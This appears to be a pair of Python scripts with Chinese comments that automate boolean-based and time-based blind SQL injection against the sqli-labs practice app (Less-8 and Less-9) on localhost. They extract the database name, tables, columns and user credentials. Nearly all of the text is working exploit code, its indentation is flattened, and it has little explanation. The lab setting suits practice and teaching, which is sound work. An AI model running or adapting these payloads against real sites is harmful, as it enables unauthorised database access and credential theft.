import requests as req
url = 'http://127.0.0.1/sqli-labs/Less-8/?id='
res = ''
select = "select database()" # 爆库
# select = "select group_concat(table_name) from information_schema.tables where table_schema='security'" # 爆表
select = "select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'" # 爆列
# select = "select group_concat(username,0x20,password)from users" # 爆字段
for i in range(1, 100):
for ascii in range(32, 128):
id = '1\' and ascii(substr(({}),{},1))={}%23'.format(select, i, ascii) # url后半部分
r = req.get(url+id) # 拼接
# print(url+id) # 可以看到完整的url句子
if "You are in" in r.text:
res += chr(ascii)
print(res)
break
if ascii == 127: # 得出结果后退出程序
# print('{}'.format(res))
exit(0)
时间盲注
import requests as req
import time
url = 'http://127.0.0.1/sqli-labs/Less-9/?id='
res = ''
select = "select database()" # 爆库
# select = "select group_concat(table_name) from information_schema.tables where table_schema='security'" # 爆表
# select = "select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'" # 爆列
# select = "select group_concat(username,0x20,password)from users" # 爆字段
last_attempts = 2 # 设置一个最大连续相同字符的尝试次数
attempts = 0
for i in range(1, 100):
low = 32
high = 127
while low <= high:
mid = (low + high) // 2 # 二分法
id = f"1\' and if(ascii(substr(({select}),{i},1))>{mid},sleep(1),null)%23"
start_time = time.time()
r = req.get(url + id)
end_time = time.time()
elapsed_time = end_time - start_time
if elapsed_time > 0.8:
low = mid + 1
else:
high = mid - 1
new_char = chr(low)
res += new_char
print(res)
if len(res) >= 2 and res[-1] == res[-2]: # 如果新添加的字符与上一个字符相同
attempts += 1
if attempts == last_attempts: # 得出答案后结束程序
break
else:
attempts = 0